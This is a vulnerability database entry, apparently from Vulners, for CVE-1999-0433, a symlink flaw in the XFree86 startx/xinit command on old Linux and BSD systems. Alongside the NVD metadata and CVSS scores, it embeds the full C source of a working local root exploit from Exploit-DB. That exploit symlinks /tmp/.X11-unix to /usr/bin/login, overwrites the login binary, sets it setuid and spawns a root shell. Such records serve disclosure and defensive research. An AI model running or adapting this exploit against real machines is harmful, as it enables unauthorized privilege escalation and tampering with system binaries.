Search...

CVE-1999-0433

1999-03-21T05:00:00

ID CVE-1999-0433
Type cve
Reporter cve@mitre.org
Modified 2008-09-09T12:34:00

Description

XFree86 startx command is vulnerable to a symlink attack, allowing local users to create files in restricted directories, possibly allowing them to gain privileges or cause a denial of service.

JSON Vulners Source

Initial Source

{"id": "CVE-1999-0433", "bulletinFamily": "NVD", "title": "CVE-1999-0433", "description": "XFree86 startx command is vulnerable to a symlink attack, allowing local users to create files in restricted directories, possibly allowing them to gain privileges or cause a denial of service.", "published": "1999-03-21T05:00:00", "modified": "2008-09-09T12:34:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0433", "reporter": "cve@mitre.org", "references": [], "cvelist": ["CVE-1999-0433"], "type": "cve", "lastseen": "2019-05-29T18:07:36", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "85eaf5d0d560bfdc7b376b2e4d785f6e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "91ae7b031d0e887309b1ae514423d843"}, {"key": "cpe23", "hash": "1f0d8331380905b820135c1a735f2d8c"}, {"key": "cvelist", "hash": "ae5e99702ae63eb770348b11e1bf0921"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a20e5567f34056412c98626d7c0696f5"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "402a6327841ca049d3498b7dcdc17b5f"}, {"key": "href", "hash": "ed483a4ccd2aa9328366beb80d318ca1"}, {"key": "modified", "hash": "331a628b8159fc12ceca02fb4c8af842"}, {"key": "published", "hash": "e31823e7f5e54a8498cc82f1f475c37f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "e7d29bafb1a56986d974470049989660"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "52f585453354fc973d4e8446a9cc161cd23f8ca28229434068b6b06246150a16", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:975"]}, {"type": "exploitdb", "idList": ["EDB-ID:19257"]}], "modified": "2019-05-29T18:07:36"}, "score": {"value": 6.7, "vector": "NONE", "modified": "2019-05-29T18:07:36"}, "vulnersScore": 6.7}, "objectVersion": "1.3", "cpe": ["cpe:/o:redhat:linux:5.1", "cpe:/a:suse:suse_linux:6.0", "cpe:/a:redhat:linux:5.1", "cpe:/a:netbsd:netbsd:1.3.2", "cpe:/a:slackware:slackware_linux:3.6", "cpe:/o:slackware:slackware_linux:3.3", "cpe:/o:netbsd:netbsd:1.3.2", "cpe:/o:slackware:slackware_linux:3.6", "cpe:/o:redhat:linux:5.2", "cpe:/o:slackware:slackware_linux:4.0", "cpe:/a:slackware:slackware_linux:3.3", "cpe:/a:suse:suse_linux:5.2", "cpe:/o:slackware:slackware_linux:3.5", "cpe:/a:slackware:slackware_linux:4.0", "cpe:/a:xfree86_project:x11r6:3.3.3", "cpe:/o:slackware:slackware_linux:3.4", "cpe:/o:netbsd:netbsd:1.3.3", "cpe:/a:netbsd:netbsd:1.3.3", "cpe:/a:suse:suse_linux:6.1", "cpe:/a:slackware:slackware_linux:3.4", "cpe:/o:suse:suse_linux:5.2", "cpe:/o:suse:suse_linux:6.1", "cpe:/a:redhat:linux:5.2", "cpe:/o:suse:suse_linux:5.1", "cpe:/a:suse:suse_linux:5.1", "cpe:/o:suse:suse_linux:6.0", "cpe:/a:slackware:slackware_linux:3.5"], "affectedSoftware": [{"name": "slackware slackware_linux", "operator": "eq", "version": "3.3"}, {"name": "slackware slackware_linux", "operator": "eq", "version": "3.6"}, {"name": "suse suse_linux", "operator": "eq", "version": "5.2"}, {"name": "netbsd netbsd", "operator": "eq", "version": "1.3.2"}, {"name": "slackware slackware_linux", "operator": "eq", "version": "3.4"}, {"name": "slackware slackware_linux", "operator": "eq", "version": "3.5"}, {"name": "redhat linux", "operator": "eq", "version": "5.2"}, {"name": "slackware slackware_linux", "operator": "eq", "version": "4.0"}, {"name": "netbsd netbsd", "operator": "eq", "version": "1.3.3"}, {"name": "xfree86_project x11r6", "operator": "eq", "version": "3.3.3"}, {"name": "suse suse_linux", "operator": "eq", "version": "6.0"}, {"name": "suse suse_linux", "operator": "eq", "version": "5.1"}, {"name": "redhat linux", "operator": "eq", "version": "5.1"}, {"name": "suse suse_linux", "operator": "eq", "version": "6.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": true, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:suse:suse_linux:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:3.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux:5.2:*:i386:*:*:*:*:*", "cpe:2.3:a:xfree86_project:x11r6:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:5.2:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:4.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-02-02T11:24:33", "bulletinFamily": "exploit", "description": "X11R6 3.3.3 Symlink Vulnerability. CVE-1999-0433. Local exploit for linux platform", "modified": "1999-03-21T00:00:00", "published": "1999-03-21T00:00:00", "id": "EDB-ID:19257", "href": "https://www.exploit-db.com/exploits/19257/", "type": "exploitdb", "title": "X11R6 3.3.3 Symlink Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/326/info\r\n\r\nThere is a symlink vulnerability known to exist under most modern linux and NetBSD distributions. It involves /tmp/.X11-unix and the tendency to follow to/overwrite the file pointed to if a symlink. It may be possible for a regular user to write arbritrary data to a file they normally have no write access to resulting in a root compromise. \r\n\r\n/*** local XFree 3.3.3-symlink root-compromise.\r\n *** Tested under FreeBSD 3.1 (but should work on others 2)\r\n *** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G. \r\n *** (check out http://www.kalug.lug.net/stealth or /coding for\r\n *** other kewl stuff!)\r\n ***\r\n *** FOR EDUCATIONAL PURPOSES ONLY!!! USE IT AT YOUR OWN RISK.\r\n *** Even if this program restores all, you should backup your\r\n *** login before running this.\r\n ***/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n\r\n#define LOGIN \"/usr/bin/login\"\r\n#define TELNET \"/usr/bin/telnet\"\r\n\r\nint cp(const char*, const char*, int);\r\n\r\nint main(int argc, char **argv)\r\n{\r\n\r\n\tchar *telnet[] = {TELNET, \"localhost\", NULL};\r\n\tchar *shell[] = {\"/bin/sh\", NULL};\r\n\tchar *X[] = {\"/usr/X11R6/bin/xinit\", NULL};\r\n\tFILE *f = NULL;\r\n\tint p = 0;\r\n\tchar buf[1000] = {0};\r\n\r\n\t/* the rootshell */\r\n\tif (!geteuid() || !getuid()) {\r\n\t\tunlink(LOGIN);\r\n\t\tcp(\"/tmp/L\", LOGIN, 1);\r\n\t\tchmod(LOGIN, 04555);\r\n\t\tprintf(\"Welcome!\\n\");\r\n\t\tunlink(\"/tmp/.X11-unix\");\r\n\t\tunlink(\"/tmp/L\");\r\n\t\texecve(*shell, shell, NULL);\r\n\t}\r\n\t\r\n\t/* back up */\r\n\tcp(LOGIN, \"/tmp/L\", 1);\r\n\tif (symlink(LOGIN, \"/tmp/.X11-unix\") < 0) {\r\n\t\tperror(\"symlink (/tmp/.X11-unix)\");\r\n\t\texit(errno);\r\n\t}\r\n\tif ((p = fork()) < 0) {\r\n\t\tperror(\"fork\");\r\n\t\texit(errno);\r\n\t} else if (p > 0) {\r\n\t\tsleep(7);\r\n\t\tkill(p, 9);\r\n\t\tcp(argv[0], LOGIN, 1);\r\n\t\texecve(telnet[0], telnet, NULL);\r\n\t\tperror(\"fatal:\");\r\n\t} else {\r\n\t\tprintf(\"Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\\n\");\r\n\t\tprintf(\"\\n-> Please give me some seconds... <-\\n\\n\");\r\n\t\texecve(X[0], X, NULL);\r\n\t}\r\n\treturn 0;\r\n}\r\n\t\r\n\t\r\nint cp(const char *from, const char *to, int how)\r\n{\r\n\tint in = 0, out = 0, r = 0;\r\n\tchar buf[1000] = {0};\r\n\t\r\n\r\n\tprintf(\"cp %s %s\\n\", from, to);\r\n\t/* overwrite ? */\r\n\tif (how == 1) \r\n\t\thow = O_RDWR|O_TRUNC|O_CREAT;\r\n\telse\r\n\t\thow = O_RDWR|O_CREAT;\r\n\r\n if ((out = open(to, how)) < 0) {\r\n\t\tperror(\"open 1\");\r\n\t\texit(errno);\r\n\t}\r\n\tif ((in = open(from, O_RDONLY)) < 0) {\r\n\t\tperror(\"open 2\");\r\n\t\texit(errno);\r\n\t}\r\n\twhile ((r = read(in, buf, 1000-1)) > 0) {\r\n\t\twrite(out,buf,r);\r\n\t\tmemset(buf,0,1000);\r\n\t}\r\n\tclose(in); close(out);\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19257/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 2032\n[CVE-1999-0433](https://vulners.com/cve/CVE-1999-0433)\nBugtraq ID: 326\n", "modified": "1999-03-28T00:00:00", "published": "1999-03-28T00:00:00", "id": "OSVDB:975", "href": "https://vulners.com/osvdb/OSVDB:975", "title": "X11R6 startx Symlink Arbitrary File Creation", "type": "osvdb", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}